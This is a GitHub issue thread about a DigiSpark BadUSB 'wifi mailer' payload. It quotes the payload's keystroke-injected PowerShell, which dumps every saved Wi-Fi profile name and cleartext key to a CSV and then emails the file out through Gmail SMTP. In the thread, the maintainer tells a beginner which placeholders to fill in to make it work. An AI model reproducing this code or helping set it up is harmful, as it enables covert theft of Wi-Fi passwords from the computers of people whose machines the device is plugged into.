### ISSUE TITLE
Just some questions, I'm brand new

### ISSUE THREAD

**Issue by dominicwilfong** [CedArctic/DigiSpark-Scripts#41]
I am attempting to use the wifi mailer payload and I'm not sure about a few things... on line 22 it says the following:

`  DigiKeyboard.print(F("(netsh wlan show profiles) | Select-String '\\:(.+)$' | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name=$name key=clear)}  | Select-String 'Key Content\\W+\\:(.+)$' | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Export-Csv -Path $env:userprofile\\temp.csv;exit"));`

Am I supposed to change anything on this line (such as "PROFILE_NAME" or "PASSWORD")?
also on line 31 it says: 

`  DigiKeyboard.print(F("$SMTPInfo = New-Object Net.Mail.SmtpClient('smtp.gmail.com', 587); $SMTPInfo.EnableSsl = $true; $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('GMAIL_USERNAME', 'GMAIL_PASSWORD'); $ReportEmail = New-Object System.Net.Mail.MailMessage; $ReportEmail.From = 'SENDER_MAIL'; $ReportEmail.To.Add('RECEIVER_MAIL'); $ReportEmail.Subject = 'DigiSpark Report'; $ReportEmail.Body = 'Attached is your report. - Regards Your Digispark'; $ReportEmail.Attachments.Add('temp.csv'); $SMTPInfo.Send($ReportEmail);exit"));`

I believe I am supposed to change GMAIL_USERNAME , GMAIL_PASSWORD , SENDER_MAIL , and RECEIVER_MAIL when changing these do I put in the full "example@gmail.com" or just the part of the email before the @ symbol? 
Also do I need admin for any of these payloads?
Thank you for the help

**Comment by CedArctic** [comment]
Just change the variable names you mentioned on line 31 and yes enter the full address. Line 22 doesn't need editing. Enjoy playing with your digispark!
